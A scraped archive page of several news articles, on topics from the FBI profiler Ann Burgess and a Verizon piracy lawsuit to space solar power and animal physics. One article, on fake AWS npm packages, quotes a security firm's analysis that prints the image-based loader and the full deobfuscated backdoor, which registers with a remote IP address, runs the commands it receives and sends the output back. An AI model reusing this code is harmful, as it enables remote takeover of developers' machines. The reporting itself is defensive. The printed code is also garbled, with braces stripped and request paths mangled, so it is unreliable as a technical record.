Author name: Mike M.

meet-the-woman-whose-research-helped-the-fbi-catch-notorious-serial-killers

Meet the woman whose research helped the FBI catch notorious serial killers

Dr. Ann Burgess helps the FBI catch serial killers in Hulu's <em>Mastermind: To Think Like a Killer.</em>” src=”https://cdn.arstechnica.net/wp-content/uploads/2024/07/mastermind5-800×535.jpg”></img><figcaption>
<p><a data-height=Enlarge / Dr. Ann Burgess helps the FBI catch serial killers in Hulu’s Mastermind: To Think Like a Killer.

YouTube/Hulu

Fans of the Netflix series Mindhunter might recall the character of Dr. Wendy Carr (Anna Torv), a psychologist who joins forces with FBI criminal profilers to study the unique psychology of serial killers in hopes of more effectively catching them. But they might not know about the inspiration for the character: Dr. Ann Wolbert Burgess, whose long distinguished career finally gets the attention it deserves in a new documentary from Hulu, Mastermind: To Think Like a Killer.

Burgess herself thought it was “fun” to see a fictional character based on her but noted that Hollywood did take some liberties. “They got it wrong,” she told Ars. “They made me a psychologist. I’m a nurse”—specifically, a forensic and psychiatric nurse who pioneered research on sex crimes, victimology, and criminal psychology.

Mastermind should go a long way toward setting things right. Hulu brought on Abby Fuller to direct, best known for her work on the Chef’s Table series for Netflix. Fuller might seem like a surprising choice for making a true crime documentary, but the streamer thought she would bring a fresh take to a well-worn genre. “I love the true crime aspects, but I thought we could do something more elevated and cinematic and really make this a character-driven piece about [Ann], with true crime elements,” Fuller told Ars.

There’s no doubt that the public has a rather morbid fascination with serial killers, and Burgess certainly has had concerns about the way media coverage and Hollywood films have turned murderers into celebrities. “Despite how obviously horrible these killers were, despite their utter brutality and the pain they inflicted upon their victims, they’d somehow become romanticized,” Burgess wrote in her memoir, A Killer by Design: Murderers, Mindhunters, and My Quest to Decipher the Criminal Mind. “All the inconvenient details that interfered with this narrative—the loss of life, issues of mental health, and the victims themselves—were simply ignored.”

Mastermind.” height=”429″ src=”https://cdn.arstechnica.net/wp-content/uploads/2024/07/mastermind6-640×429.jpg” width=”640″>

Enlarge / A re-creation of Dr. Ann Burgess listening to taped interviews of serial killers in Mastermind.

YouTube/Hulu

That said, it’s not like anyone who finds the twisted psychology of serial killers, or true crime in general, fascinating is a sociopath or murderer in the making. “I think we all grapple with light and dark and how we see it in the world,” said Fuller. “There’s an inherent fascination with what makes someone who they are, with human behavior. And if you’re interested in human behavior, a serial killer exhibits some of the more fascinating behavior that exists. Trying to grasp the darkest of the dark and understand it is a way to ensure we never become it.”

“I think it’s a human factor,” Burgess said. “I don’t see anything wrong with it. There is a fascination to try to understand why people commit these horrifying crimes. How can people do these things? But I also think people like to play detective a little bit. I think that’s normal. You don’t want to be fooled; you don’t want to become a victim. So what can you learn to avoid it?”

For Burgess, it has always been about the victims. She co-founded one of the first crisis counseling programs at Boston City Hospital in the 1970s with Boston College sociologist Lynda Lytle Holmstrom. The duo conducted research on the emotional and traumatic effects of sexual violence, interviewing nearly 150 rape victims in the process. They were the first to realize that rape was about power and control rather than sex, and coined the term “rape trauma syndrome” to describe the psychological after-effects.

(WARNING: Some graphic details about violent crimes below.)

Dr. Ann Burgess research helped legitimize the FBI's Behavioral Sciences Unit.

Enlarge / Dr. Ann Burgess research helped legitimize the FBI’s Behavioral Sciences Unit.

Hulu

Their work caught the attention of Roy Hazelwood of the FBI, who invited Burgess to the FBI Academy in Quantico, Virginia, to give lectures to agents in the fledgling Behavioral Sciences Unit (BSU) on victimology and violent sex crimes. Thus began a decades-long collaboration that established criminal profiling as a legitimate practice in law enforcement.

Meet the woman whose research helped the FBI catch notorious serial killers Read More »

record-labels-sue-verizon-for-not-disconnecting-pirates’-internet-service

Record labels sue Verizon for not disconnecting pirates’ Internet service

Music piracy —

Lawsuit: One user’s IP address was identified in 4,450 infringement notices.

A Verizon service truck with a FiOS logo printed on the side.

Getty Images | Smith Collection/Gado

Major record labels sued Verizon on Friday, alleging that the Internet service provider violated copyright law by continuing to serve customers accused of pirating music. Verizon “knowingly provides its high-speed service to a massive community of online pirates,” said the complaint filed in US District Court for the Southern District of New York.

Universal, Sony, and Warner say they have sent over 340,000 copyright infringement notices to Verizon since early 2020. “Those notices identify specific subscribers on Verizon’s network stealing Plaintiffs’ sound recordings through peer-to-peer (‘P2P’) file-sharing networks that are notorious hotbeds for copyright infringement,” the lawsuit said.

Record labels allege that “Verizon ignored Plaintiffs’ notices and buried its head in the sand” by “continu[ing] to provide its high-speed service to thousands of known repeat infringers so it could continue to collect millions of dollars from them.” They say that “Verizon has knowingly contributed to, and reaped substantial profits from, massive copyright infringement committed by tens of thousands of its subscribers.”

The firms allege that Verizon is guilty of contributory and vicarious copyright infringement and should have to pay damages of up to $150,000 for each work infringed. Plaintiffs filed what they call a “non-exhaustive” list of infringed works that includes 17,335 titles. That would imply requested damages of over $2.6 billion.

Numerous lawsuits against ISPs

Record labels and movie studios have filed numerous copyright lawsuits against Internet providers. Perhaps the most significant ongoing case involves Cox Communications, which has been fighting a $1 billion jury verdict since 2019.

Cox received support from groups such as the Electronic Frontier Foundation, which warned that the big money judgment could cause broadband providers to disconnect people from the Internet based only on accusations of copyright infringement. The US Court of Appeals for the 4th Circuit overturned the $1 billion verdict in February 2024, rejecting Sony’s claim that Cox profited directly from copyright infringement committed by users of Cox’s cable broadband network.

While judges in the Cox case reversed a vicarious liability verdict, they affirmed the jury’s additional finding of willful contributory infringement and ordered a new damages trial.

Cox recently said it is seeking a Supreme Court review on the questions of “whether an Internet service provider materially contributes to copyright infringement by declining to disconnect an Internet account knowing someone is likely to use it to infringe,” and “whether a secondary infringer can be adjudged willful based merely on knowledge of another’s direct infringement.” There is a circuit split on both questions, Cox said.

4,450 notices about one IP address

In the Verizon case, record labels claim that thousands of Verizon subscribers “were the subject of 20 or more notices from Plaintiffs, and more than 500 subscribers were the subject of 100 or more notices. One particularly egregious Verizon subscriber was single-handedly the subject of 4,450 infringement notices from Plaintiffs alone.”

That Verizon subscriber’s IP address was identified in 4,450 infringement notices between March 2021 and August 2023, the lawsuit said. Two other subscribers were allegedly the subject of 2,703 and 2,068 infringement notices, respectively.

“Verizon acknowledged that it received these notices of infringement sent by Plaintiffs’ representatives,” the lawsuit said. “Yet rather than taking any steps to address its customers’ illegal use of its network, Verizon deliberately chose to ignore Plaintiffs’ notices, willfully blinding itself to that information and prioritizing its own profits over its legal obligations.”

The plaintiffs claim that “Verizon has gone out of its way not to take action against subscribers engaging in repeated copyright infringement,” and “failed to terminate or otherwise take any meaningful action against the accounts of repeat infringers of which it was aware.”

“It is well-established law that if a party materially assists someone it knows is engaging in copyright infringement, that party is fully liable for the infringement as if it had infringed directly,” the lawsuit said.

Complaint system too onerous, suit claims

The lawsuit also complains that Verizon hasn’t made it easier for copyright owners to file complaints about Internet users:

Through one channel, Verizon claims to allow copyright holders to send P2P notices through a so-called “Anti-Piracy Cooperation Program,” but it has attached such onerous conditions to participation that the program is rendered a nullity. Not only has Verizon required participants to pay burdensome fees for simple, automated processes like Internet Protocol (“IP”) address lookups and notice forwarding, but participants have been required to waive their copyright claims, broadly indemnify Verizon, and, tellingly, keep the terms of the program confidential. Verizon has also limited the number of notices it will forward pursuant to the program.

The lawsuit said Verizon also allows copyright owners to send email notices of infringement instead of using the channel described above. The email method apparently doesn’t require copyright owners to waive their copyright claims or make payments, but the lawsuit alleges that “Verizon does not forward these notices to subscribers or track the number of email notices sent regarding repeat infringing subscribers. Verizon also arbitrarily caps the number of notices permitted per copyright holder at this address—ironic, to say the least, given that Verizon ignored hundreds of thousands of Plaintiffs’ notices to this email inbox.”

We contacted Verizon about the lawsuit and will update this article if it provides a response.

Record labels sue Verizon for not disconnecting pirates’ Internet service Read More »

here’s-how-carefully-concealed-backdoor-in-fake-aws-files-escaped-mainstream-notice

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice

DEVS IN THE CROSSHAIRS —

Files available on the open source NPM repository underscore a growing sophistication.

A cartoon door leads to a wall of computer code.

Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.

The packages—img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy—were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added an additional JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.

Growing sophistication

“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”

In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.

The care the package developers put into the code and the effectiveness of their tactics underscores the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.

Phylum researchers provided a deep-dive analysis of how the concealment worked:

Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code.

However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.

After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.

function processImage(filePath)   	console.log("Processing image...");  	const data = fs.readFileSync(filePath);  	let analyzepixels = "";  	let convertertree = false;    	for (let i = 0; i < data.length; i++) {      	const value = data[i];      	if (value >= 32 && value <= 126) {          	analyzepixels += String.fromCharCode(value);      	} else {          	if (analyzepixels.length > 2000)               	convertertree = true;              	break;          	          	analyzepixels = "";      	  	}        	// ...  

The threat actor then defines two distinct bodies of a function and stores each in their own variables, imagebyte and analyzePixels.

let analyzePixеls = `  	if (false)       	exec("node -v", (error, stdout, stderr) =>           	console.log(stdout);      	);  	  	console.log("check nodejs version...");  	`;    let imagebyte = `  	const httpsOptions =       	hostname: 'cloudconvert.com',      	path: '/image-converter',      	method: 'POST'  	;  	const req = https.request(httpsOptions, res =>       	console.log('Status Code:', res.statusCode);  	);  	req.on('error', error =>       	console.error(error);  	);  	req.end();  	console.log("Executing operation...");  	`;  

If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if converttree is set, it will execute whatever is contained in the script we extracted from the image file.

if (convertertree)   	console.log("Optimization complete. Applying advanced features...");  	imagebyte = analyzepixels;   else   	console.log("Optimization complete. No advanced features applied.");    

Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.

if (analyzepixels.length > 2000)     convertertree = true;    break;    

The author then creates a new function using either code that sends an empty POST request to cloudconvert.com or initiates executing whatever was extracted from the image files.

const func = new Function('https', 'exec', 'os', imagebyte);  func(https, exec, os);  

The lingering question is, what is contained in the images that this is trying to execute?

Command-and-Control in a JPEG

Looking at the bottom of the loadformat.js file, we see the following:

processImage('logo1.jpg');  processImage('logo2.jpg');  processImage('logo3.jpg');  

We find these three files in the package’s root, which are included below without modification, unless otherwise noted.

Appears as logo1.jpg in the package
Appears as logo2.jpg in the package
Appears as logo3.jpg in the package. Modified here as the file is corrupted and in some cases would not display properly.

If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the converttree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:

let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  const agent = new https.Agent(    'rejectUnauthorized': false  );  function registerClient()     const _0x47c6de = JSON.stringify(clientInfo);    const _0x5a10c1 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/register",  	'method': "POST",  	'headers':     	'Content-Type': "application/json",    	'Content-Length': Buffer.byteLength(_0x47c6de)  	,  	'agent': agent    ;    const _0x38f695 = https.request(_0x5a10c1, _0x454719 =>   	console.log("Registered with server as " + clientInfo.name);    );    _0x38f695.on("error", _0x1159ec =>   	console.error("Problem with registration: " + _0x1159ec.message);    );    _0x38f695.write(_0x47c6de);    _0x38f695.end();    function fetchAndExecuteCommand()     const _0x2dae30 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/get-command?clientId=" + encodeURIComponent(clientInfo.name),  	'method': "GET",  	'agent': agent    ;    https.get(_0x2dae30, _0x4a0c09 =>   	let _0x41cd12 = '';  	_0x4a0c09.on("data", _0x5cbbc5 =>     	_0x41cd12 += _0x5cbbc5.toString();  	);  	_0x4a0c09.on("end", () =>     	console.log("Received command:", _0x41cd12);    	if (_0x41cd12.startsWith('setInterval:'))       	const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);      	if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0)         	clearInterval(intervalId);        	fetchInterval = _0x1e3896 0x3e8;        	intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);        	console.log("Interval has been updated to " + _0x1e3896 + " seconds.");      	 else         	console.log("Invalid interval command received.");      	    	 else       	if (_0x41cd12.startsWith("cd "))         	const _0x58bd7d = _0x41cd12.substring(0x3).trim();        	try           	process.chdir(_0x58bd7d);          	console.log("Changed directory to " + process.cwd());        	 catch (_0x2ee272)           	console.error("Change directory failed: " + _0x2ee272);        	      	 else if (_0x41cd12 !== "No commands")         	exec(_0x41cd12,           	'cwd': process.cwd()        	, (_0x5da676, _0x1ae10c, _0x46788b) =>           	let _0x4a96cd = _0x1ae10c;          	if (_0x5da676)             	console.error("exec error: " + _0x5da676);            	_0x4a96cd += "\nError: " + _0x46788b;          	          	postResult(_0x4a96cd);        	);      	 else         	console.log("No commands to execute");      	    	  	);    ).on("error", _0x2e8190 =>   	console.error("Got error: " + _0x2e8190.message);    );    function postResult(_0x1d73c1)     const _0xc05626 =   	'hostname': "85.208.108.29",  	'port': 0x1bb,  	'path': "https://arstechnica.com/post-result?clientId=" + encodeURIComponent(clientInfo.name),  	'method': "POST",  	'headers':     	'Content-Type': "text/plain",    	'Content-Length': Buffer.byteLength(_0x1d73c1)  	,  	'agent': agent    ;    const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 =>   	console.log("Result sent to the server");    );    _0x2fcb05.on('error', _0x1f60a7 =>   	console.error("Problem with request: " + _0x1f60a7.message);    );    _0x2fcb05.write(_0x1d73c1);    _0x2fcb05.end();    registerClient();  

This code first registers the new client with the remote C2 by sending the following clientInfo to 85.208.108.29.

const clientInfo =     'name': os.hostname(),    'os': os.type() + " " + os.release()  ;  

It then sets up an interval that periodically loops through and fetches commands from the attacker every 5 seconds.

let fetchInterval = 0x1388;  let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);  

Received commands are executed on the device, and the output is sent back to the attacker on the endpoint /post-results?clientId=.

One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of the XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.

The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.

In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.

“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice Read More »

will-space-based-solar-power-ever-make-sense?

Will space-based solar power ever make sense?

Artist's depiction of an astronaut servicing solar panels against the black background of space.

Is space-based solar power a costly, risky pipe dream? Or is it a viable way to combat climate change? Although beaming solar power from space to Earth could ultimately involve transmitting gigawatts, the process could be made surprisingly safe and cost-effective, according to experts from Space Solar, the European Space Agency, and the University of Glasgow.

But we’re going to need to move well beyond demonstration hardware and solve a number of engineering challenges if we want to develop that potential.

Designing space-based solar

Beaming solar energy from space is not new; telecommunications satellites have been sending microwave signals generated by solar power back to Earth since the 1960s. But sending useful amounts of power is a different matter entirely.

“The idea [has] been around for just over a century,” said Nicol Caplin, deep space exploration scientist at the ESA, on a Physics World podcast. “The original concepts were indeed sci-fi. It’s sort of rooted in science fiction, but then, since then, there’s been a trend of interest coming and going.”

Researchers are scoping out multiple designs for space-based solar power. Matteo Ceriotti, senior lecturer in space systems engineering at the University of Glasgow, wrote in The Conversation that many designs have been proposed.

The Solaris initiative is exploring two possible technologies, according to Sanjay Vijendran, lead for the Solaris initiative at the ESA: one that involves beaming microwaves from a station in geostationary orbit down to a receiver on Earth and another that involves using immense mirrors in a lower orbit to reflect sunlight down onto solar farms. He said he thinks that both of these solutions are potentially valuable. Microwave technology has drawn wider interest and was the main focus of these interviews. It has enormous potential, although high-frequency radio waves can also be used.

“You really have a source of 24/7 clean power from space,” Vijendran said. The power can be transmitted regardless of weather conditions because of the frequency of the microwaves.

“A 1-gigawatt power plant in space would be comparable to the top five solar farms on earth. A power plant with a capacity of 1 gigawatt could power around 875,000 households for one year,” said Andrew Glester, host of the Physics World podcast.

But we’re not ready to deploy anything like this. “It will be a big engineering challenge,” Caplin said. There are a number of physical hurdles involved in successfully building a solar power station in space.

Using microwave technology, the solar array for an orbiting power station that generates a gigawatt of power would have to be over 1 square kilometer in size, according to a Nature article by senior reporter Elizabeth Gibney. “That’s more than 100 times the size of the International Space Station, which took a decade to build.” It would also need to be assembled robotically, since the orbiting facility would be uncrewed.

The solar cells would need to be resilient to space radiation and debris. They would also need to be efficient and lightweight, with a power-to-weight ratio 50 times more than the typical silicon solar cell, Gibney wrote. Keeping the cost of these cells down is another factor that engineers have to take into consideration. Reducing the losses during power transmission is another challenge, Gibney wrote. The energy conversion rate needs to be improved to 10–15 percent, according to the ESA. This would require technical advances.

Space Solar is working on a satellite design called CASSIOPeiA, which Physics World describes as looking “like a spiral staircase, with the photovoltaic panels being the ‘treads’ and the microwave transmitters—rod-shaped dipoles—being the ‘risers.’” It has a helical shape with no moving parts.

“Our system’s comprised of hundreds of thousands of the same dinner-plate-sized power modules. Each module has the PV which converts the sun’s energy into DC electricity,” said Sam Adlen, CEO of Space Solar.

“That DC power then drives electronics to transmit the power… down toward Earth from dipole antennas. That power up in space is converted to [microwaves] and beamed down in a coherent beam down to the Earth where it’s received by a rectifying antenna, reconverted into electricity, and input to the grid.”

Adlen said that robotics technologies for space applications, such as in-orbit assembly, are advancing rapidly.

Ceriotti wrote that SPS-ALPHA, another design, has a large solar-collector structure that includes many heliostats, which are modular small reflectors that can be moved individually. These concentrate sunlight onto separate power-generating modules, after which it’s transmitted back to Earth by yet another module.

Will space-based solar power ever make sense? Read More »

dirty-diaper-resold-on-amazon-ruined-a-family-business,-report-says

Dirty diaper resold on Amazon ruined a family business, report says

Dirty diaper resold on Amazon ruined a family business, report says

A feces-encrusted swim diaper tanked a family business after Amazon re-sold it as new, Bloomberg reported, triggering a bad review that quickly turned a million-dollar mom-and-pop shop into a $600,000 pile of debt.

Paul and Rachelle Baron, owners of Beau & Belle Littles, told Bloomberg that Amazon is supposed to inspect returned items before reselling them. But the company failed to detect the poop stains before reselling a damaged item that triggered a one-star review in 2020 that the couple says doomed their business after more than 100 buyers flagged it as “helpful.”

“The diaper arrived used and was covered in poop stains,” the review said, urging readers to “see pics.”

Because others marked the review as helpful, Amazon increased its visibility on the product page, just as the Barons “were executing a plan to triple their annual sales to $3 million in 2020.” No matter how many 5-star reviews were left, this one bad review blaming the seller for the issue continued to “haunt” the family business, the Barons said.

“Nothing could have been more disgusting!!” the review continued. “I am assuming someone returned it after using it and the company simply did not check the item and then shipped it to us as if it was brand new.”

Amazon says that it prohibits negative reviews that violate community guidelines, including by focusing on seller, order, or shipping feedback rather than on the item’s quality. Other one-star reviews for the same product that the Barons seemingly accept as valid comment on quality, leaving feedback like the diaper fitting too tightly or leaking. But the bad review focused on the dirty item being resold as new likely should have been removed, Bloomberg reported, since it “suggests the item had already been used.” The review also seemingly violated community guidelines by focusing on “the company” not checking the item before shipping, blaming the seller for Amazon’s return inspection process.

But Amazon ultimately declined to remove the bad review, Paul Baron told Bloomberg. The buyer who left the review, a teacher named Erin Elizabeth Herbert, told Bloomberg that the Barons had reached out directly to explain what happened, but she forgot to update the review and still has not as of this writing.

“I always meant to go back and revise my review to reflect that, and life got busy and I never did,” Herbert told Bloomberg.

Her review remains online, serving as a warning for parents to avoid buying from the family business.

“These were not small stains either,” Herbert’s review said. “I was extremely grossed out. Thank god I saw the stains and didn’t put it on my baby! I will be returning this ASAP, and I sure hope they check it out when they get it back, but I wouldn’t be surprised if they just ship it to some other unsuspecting parent.”

The Barons told Ars they think the buyer hasn’t updated the review because she doesn’t understand how damaging it has been to their business.

Ars could not immediately reach Amazon for comment, but a spokesperson, Maria Boschetti, seemed to suggest to Bloomberg that there was little the Barons could do to correct the issue now.

“We are sorry to hear that a seller feels their return was not evaluated correctly and resulted in a negative review,” Boschetti told Bloomberg. “We encourage selling partners to reach out with any concerns, and we listen to their feedback to help us continue improving the selling experience.”

On Amazon’s site, other sellers have complained about the company’s failure to remove reviews that clearly violate community guidelines. In one case, an Amazon support specialist named Danika acknowledged that the use of profanity in a review, for example, “seems particularly cut and dry as a violation,” promising to escalate the complaint. However, Danika appeared to abandon the thread after that, with the user commenting that the review remained up after the escalation.

The Barons are now selling enough inventory through Beau & Belle Littles to pay down their debt, but they are struggling to make a living after becoming a prominent Amazon success story after launching their business a decade ago. The couple told Bloomberg that a “loan secured by their home” has complicated “the prospect of filing for bankruptcy,” and both have taken on other jobs to make ends meet since the review was posted.

The Barons told Ars they’ve given up on resolving the issue with Amazon after a support specialist appeared demoralized, admitting that “it’s completely” Amazon’s “fault” but there was nothing he could do.

“The last four years have been an emotional train wreck,” Paul Baron told Bloomberg. “Shoppers might think returning a poopy diaper to Amazon is a victimless way to get their money back, but we’re a small, family business, and this is how we pay our mortgage.”

Dirty diaper resold on Amazon ruined a family business, report says Read More »

microsoft-cto-kevin-scott-thinks-llm-“scaling-laws”-will-hold-despite-criticism

Microsoft CTO Kevin Scott thinks LLM “scaling laws” will hold despite criticism

As the word turns —

Will LLMs keep improving if we throw more compute at them? OpenAI dealmaker thinks so.

Kevin Scott, CTO and EVP of AI at Microsoft speaks onstage during Vox Media's 2023 Code Conference at The Ritz-Carlton, Laguna Niguel on September 27, 2023 in Dana Point, California.

Enlarge / Kevin Scott, CTO and EVP of AI at Microsoft speaks onstage during Vox Media’s 2023 Code Conference at The Ritz-Carlton, Laguna Niguel on September 27, 2023 in Dana Point, California.

During an interview with Sequoia Capital’s Training Data podcast published last Tuesday, Microsoft CTO Kevin Scott doubled down on his belief that so-called large language model (LLM) “scaling laws” will continue to drive AI progress, despite some skepticism in the field that progress has leveled out. Scott played a key role in forging a $13 billion technology-sharing deal between Microsoft and OpenAI.

“Despite what other people think, we’re not at diminishing marginal returns on scale-up,” Scott said. “And I try to help people understand there is an exponential here, and the unfortunate thing is you only get to sample it every couple of years because it just takes a while to build supercomputers and then train models on top of them.”

LLM scaling laws refer to patterns explored by OpenAI researchers in 2020 showing that the performance of language models tends to improve predictably as the models get larger (more parameters), are trained on more data, and have access to more computational power (compute). The laws suggest that simply scaling up model size and training data can lead to significant improvements in AI capabilities without necessarily requiring fundamental algorithmic breakthroughs.

Since then, other researchers have challenged the idea of persisting scaling laws over time, but the concept is still a cornerstone of OpenAI’s AI development philosophy.

You can see Scott’s comments in the video below beginning around 46: 05:

Microsoft CTO Kevin Scott on how far scaling laws will extend

Scott’s optimism contrasts with a narrative among some critics in the AI community that progress in LLMs has plateaued around GPT-4 class models. The perception has been fueled by largely informal observations—and some benchmark results—about recent models like Google’s Gemini 1.5 Pro, Anthropic’s Claude Opus, and even OpenAI’s GPT-4o, which some argue haven’t shown the dramatic leaps in capability seen in earlier generations, and that LLM development may be approaching diminishing returns.

“We all know that GPT-3 was vastly better than GPT-2. And we all know that GPT-4 (released thirteen months ago) was vastly better than GPT-3,” wrote AI critic Gary Marcus in April. “But what has happened since?”

The perception of plateau

Scott’s stance suggests that tech giants like Microsoft still feel justified in investing heavily in larger AI models, betting on continued breakthroughs rather than hitting a capability plateau. Given Microsoft’s investment in OpenAI and strong marketing of its own Microsoft Copilot AI features, the company has a strong interest in maintaining the perception of continued progress, even if the tech stalls.

Frequent AI critic Ed Zitron recently wrote in a post on his blog that one defense of continued investment into generative AI is that “OpenAI has something we don’t know about. A big, sexy, secret technology that will eternally break the bones of every hater,” he wrote. “Yet, I have a counterpoint: no it doesn’t.”

Some perceptions of slowing progress in LLM capabilities and benchmarking may be due to the rapid onset of AI in the public eye when, in fact, LLMs have been developing for years prior. OpenAI continued to develop LLMs during a roughly three-year gap between the release of GPT-3 in 2020 and GPT-4 in 2023. Many people likely perceived a rapid jump in capability with GPT-4’s launch in 2023 because they had only become recently aware of GPT-3-class models with the launch of ChatGPT in late November 2022, which used GPT-3.5.

In the podcast interview, the Microsoft CTO pushed back against the idea that AI progress has stalled, but he acknowledged the challenge of infrequent data points in this field, as new models often take years to develop. Despite this, Scott expressed confidence that future iterations will show improvements, particularly in areas where current models struggle.

“The next sample is coming, and I can’t tell you when, and I can’t predict exactly how good it’s going to be, but it will almost certainly be better at the things that are brittle right now, where you’re like, oh my god, this is a little too expensive, or a little too fragile, for me to use,” Scott said in the interview. “All of that gets better. It’ll get cheaper, and things will become less fragile. And then more complicated things will become possible. That is the story of each generation of these models as we’ve scaled up.”

Microsoft CTO Kevin Scott thinks LLM “scaling laws” will hold despite criticism Read More »

china-tells-wto-that-us-ev-subsidies-are-unfair-trade-barriers

China tells WTO that US EV subsidies are unfair trade barriers

trade war continues —

China says it’s unfair that only EVs made in North America qualify for tax credits.

China money RMB and USA USD

Getty Images

The ongoing dispute between the United States and China over electric vehicles shows no sign of abating. Today, Reuters reports that China has asked the World Trade Organization to set up a special panel to determine if US EV subsidies are an unfair trade barrier.

The Inflation Reduction Act of 2022 has been the most significant climate legislation in US history, with hundreds of billions of dollars of funding for the clean energy transition. Among its many details, it revamped the federal tax credit for buying a new electric vehicle.

In the past, a credit of up to $7,500 was tied to a plug-in vehicle’s battery capacity. But it’s now tied to where the car and its batteries were assembled, as well as where the battery minerals come from. Final assembly of the vehicle must be in North America, for example, and ever-increasing amounts of the battery pack’s content and value must come from North America or a country with which the US has a free trade agreement.

Even more troubling for Chinese automakers is a rule from the US Treasury Department that prohibits tax subsidies for vehicles manufactured by companies linked to “foreign entities of concern,” a category that includes Russia, North Korea, Iran, and China.

The measures were included in tax credit rules after extensive lobbying from automakers and unions in the US and politicians from both sides of the aisle. Pressure from the automotive industry also succeeded in getting the Mexican government to promise not to subsidize new Chinese EV factories south of the US border.

In May, US President Joe Biden levied a new 100 percent tariff targeted at specific Chinese imports, including EVs. In Europe, similar fears over the impact of heavily subsidized Chinese EVs on domestic car production saw the EU raise new tariffs of up to 37.6 percent on Chinese-made EVs, despite objections from the German auto industry.

China’s action at the WTO actually predates the new US EV tariffs—it first went to the trade organization in March, arguing that the US tax credits hinder fair competition and break existing WTO agreements.

China’s commerce ministry told Reuters that protectionist EV subsidies from the US “undermine international cooperation on climate change.”

China tells WTO that US EV subsidies are unfair trade barriers Read More »

animals-use-physics?-let-us-count-the-ways

Animals use physics? Let us count the ways

kitten latches on to a pole with its two front paws

Isaac Newton would never have discovered the laws of motion had he studied only cats.

Suppose you hold a cat, stomach up, and drop it from a second-story window. If a cat is simply a mechanical system that obeys Newton’s rules of matter in motion, it should land on its back. (OK, there are some technicalities—like this should be done in a vacuum, but ignore that for now.) Instead, most cats usually avoid injury by twisting themselves on the way down to land on their feet.

Most people are not mystified by this trick—everybody has seen videos attesting to cats’ acrobatic prowess. But for more than a century, scientists have wondered about the physics of how cats do it. Clearly, the mathematical theorem analyzing the falling cat as a mechanical system fails for live cats, as Nobel laureate Frank Wilczek points out in a recent paper.

“This theorem is not relevant to real biological cats,” writes Wilczek, a theoretical physicist at MIT. They are not closed mechanical systems, and can “consume stored energy … empowering mechanical motion.”

Nevertheless, the laws of physics do apply to cats—as well as every other kind of animal, from insects to elephants. Biology does not avoid physics; it embraces it. From friction on microscopic scales to fluid dynamics in water and air, animals exploit physical laws to run or swim or fly. Every other aspect of animal behavior, from breathing to building shelters, depends in some way on the restrictions imposed, and opportunities permitted, by physics.

“Living organisms are … systems whose actions are constrained by physics across multiple length scales and timescales,” Jennifer Rieser and coauthors write in the current issue of the Annual Review of Condensed Matter Physics.

While the field of animal behavior physics is still in its infancy, substantial progress has been made in explaining individual behaviors, along with how those behaviors are shaped via interactions with other individuals and the environment. Apart from discovering more about how animals perform their diverse repertoire of skills, such research may also lead to new physics knowledge gained by scrutinizing animal abilities that scientists don’t yet understand.

Critters in motion

Physics applies to animals in action over a wide range of spatial scales. At the smallest end of the range, attractive forces between nearby atoms facilitate the ability of geckos and some insects to climb up walls or even walk on ceilings. On a slightly larger scale, textures and structures provide adhesion for other biological gymnastics. In bird feathers, for instance, tiny hooks and barbs act like Velcro, holding feathers in position to enhance lift when flying, Rieser and colleagues report.

Biological textures also aid movement by facilitating friction between animal parts and surfaces. Scales on California king snakes possess textures that allow rapid forward sliding, but increase friction to retard backward or sideways motion. Some sidewinding snakes have apparently evolved different textures that reduce friction in the direction of motion, recent research suggests.

